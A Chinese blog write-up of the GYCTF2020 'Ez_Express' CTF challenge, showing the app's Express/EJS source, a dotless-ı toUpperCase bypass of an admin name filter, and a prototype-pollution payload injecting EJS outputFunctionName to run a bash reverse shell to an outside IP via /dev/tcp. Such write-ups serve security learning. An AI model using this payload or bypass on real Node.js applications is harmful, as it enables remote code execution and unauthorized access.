[GYCTF2020]Ez_Express

最新推荐文章于 2023-03-13 19:40:32 发布
最新推荐文章于 2023-03-13 19:40:32 发布
阅读量703 收藏
点赞数 2
分类专栏: node.js | js 文章标签: node.js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115919976
版权

前言

废物的我 区块链也被虐惨了。。。感觉这个区块链tm的就是低配版的pwn,这几天也比较浮躁,没法专心下去去研究区块链,就来重回web,做几道题放松一下。

WP

进入是个登录,随便注册一下,必须要ADMIN才可以。f12看一下,发现存在www.zip泄露,把源码下载下来审计一下,把几个js文件大致扫一下,发现用了ejs,心中一喜。。。再看看index.js:

var express = require('express');
var router = express.Router();
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a
}
const clone = (a) => {
  return merge({}, a);
}
function safeKeyword(keyword) {
  if(keyword.match(/(admin)/is)) {
      return keyword
  }

  return undefined
}

router.get('/', function (req, res) {
  if(!req.session.user){
    res.redirect('/login');
  }
  res.outputFunctionName=undefined;
  res.render('index',data={'user':req.session.user.user});
});


router.get('/login', function (req, res) {
  res.render('login');
});



router.post('/login', function (req, res) {
  if(req.body.Submit=="register"){
   if(safeKeyword(req.body.userid)){
    res.end("<script>alert('forbid word');history.go(-1);</script>") 
   }
    req.session.user={
      'user':req.body.userid.toUpperCase(),
      'passwd': req.body.pwd,
      'isLogin':false
    }
    res.redirect('/'); 
  }
  else if(req.body.Submit=="login"){
    if(!req.session.user){res.end("<script>alert('register first');history.go(-1);</script>")}
    if(req.session.user.user==req.body.userid&&req.body.pwd==req.session.user.passwd){
      req.session.user.isLogin=true;
    }
    else{
      res.end("<script>alert('error passwd');history.go(-1);</script>")
    }
  
  }
  res.redirect('/'); ;
});
router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});
router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})
module.exports = router;

这里对admin进行了正则的过滤:

function safeKeyword(keyword) {
  if(keyword.match(/(admin)/is)) {
      return keyword
  }

但是发现这里给注册的用户名转了大写,用的toUpperCase():

router.post('/login', function (req, res) {
  if(req.body.Submit=="register"){
   if(safeKeyword(req.body.userid)){
    res.end("<script>alert('forbid word');history.go(-1);</script>") 
   }
    req.session.user={
      'user':req.body.userid.toUpperCase(),
      'passwd': req.body.pwd,
      'isLogin':false
    }

想到了这个函数的一个绕过:

在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。
在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。

因此用ı来绕过,admın即可成功成为ADMIN。
然后就是这个/action了:

router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});

很明显的原型链污染,再发现下面还有个/info:

router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})

是outputFunctionName,提示的太明显了,ejs的那个EXP直接打:

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/118.31.168.198/39543 0>&1\"');var __tmp2"}}

先访问/action进行原型链污染,再访问/info进行模板渲染,实现RCE:
在这里插入图片描述

bfengj
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
ez_setup.py下载
05-16
ez_setup.py下载
ez_setup安装源码
01-09
安装ez_setup需要的py文件,支持win系统32位
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
2021-3-18_js原型链之_[GYCTF2020]Ez_Express
抒情诗
03-18 400
这题是第一次接触到的js原型链,学得太慢了 新手学习,不免有错漏。 js的原型链污染就是js在调用数组下标或者对象的属性的时候如果没有在自己这里发现相关的就会自动向上查找,emmm因为js中一切皆对象,一个对象的__proto__还是一个对象,对象.__proto__就叫做对象的原型?好像是这样。然后会一直向上查找知道找到Object的原型为null似乎是,然后他向上查找的这条链就叫做JavaScript的原型链。我们这里要用的原型链污染其实就是因为,如果JavaScript代码之中有一个东西没有经过定义并
[GYCTF2020]Ezsqli
SopRomeo的博客
07-21 1113
话不多说,直接注 fuzz一波,发现输入分号和单引号无果,并且过滤了关键字符 猜测整形注入 无果,尝试异或注入 发现可行,这个注入我做的挺多了,就不细说了,具体可以去看我的博文 极客大挑战finalsql 注入的时候发现他过滤or 这样我们的information就不能用了 换成innodb_table_stats绕过也无果 发现sys.x$schema_flattened_keys 或者 sys.schema_table_statistics_with_buffer可以替代上面那个,果然条条道路通
CTFshow nodejs
starttv的博客
11-19 612
​Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器而不是某种库。 Nodejs 是基于 Chrome 的 V8 引擎开发的一个 C++ 程序,目的是提供一个 JS 的运行环境。最早 Nodejs 主要是安装在服务器上,辅助大家用 JS 开发高性能服务器代码,但是后来 Nodejs 在前端也大放异彩,带来了 Web 前端开发的革命。
[BMZCTF]-easy_exec
cjdgg的博客
05-23 209
[BMZCTF]-easy_exec 题目直接给出源代码,看这样子,应该又是绕过过滤然后命令执行 这道题先搜一搜file命令的作用,并查看相关参数的作用后,确定file没用后,确定了这题考点应该是要插入我们想要执行的命令 这里看了一下,把反引号和单引号都过滤了,但是却没过滤双引号,偏偏双引号还是这题用来框住命令的 直接构造";cat%20/flag",这两个双引号分别用来闭合题目中的双引号。 成功拿到flag ...
hxpctf2022 valentine
qq_61768489的博客
03-13 758
它是这里来防止模板注入, 写题的时候走到这里就是想绕过校验,但是没有找到合适的方法。其实我们用bp抓包就可以忽略这里的重定向问题哈哈哈,可以顺利拿到重定向的uudi路径。全局肯定不行了,所以使用单个模板文件方式,可以看到,其实就是多写一句。拿到题目的感觉是模板渲染嘛,并且是ejs模板。一般的payload是。
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 4711
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
ctfshow—Node.js漏洞总结
cosmoslin的博客
12-27 3713
1 Js大小写绕过 ctfshow web334 下载源码 var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; }); }; 需要以账户ctfshow,密码123456登录
蚁景网安 CTF竞赛 HCTF-Final-Misc200
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-12 1243
本实验选自XCTF-HCTF杭州(杭电)站选拔赛决赛,实验综合了Wireshark网络数据包流量分析、doc文档末尾附加数据识别、DES解密、PDF隐写相关的知识。
ez_udp_connect
最新发布
05-24
`ez_udp_connect` 是一个函数,一般用于创建一个 UDP(User Datagram Protocol)连接。UDP 是一种无连接的协议,它不提供像 TCP(Transmission Control Protocol)那样的可靠性,但在某些情况下,它的速度和效率比 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值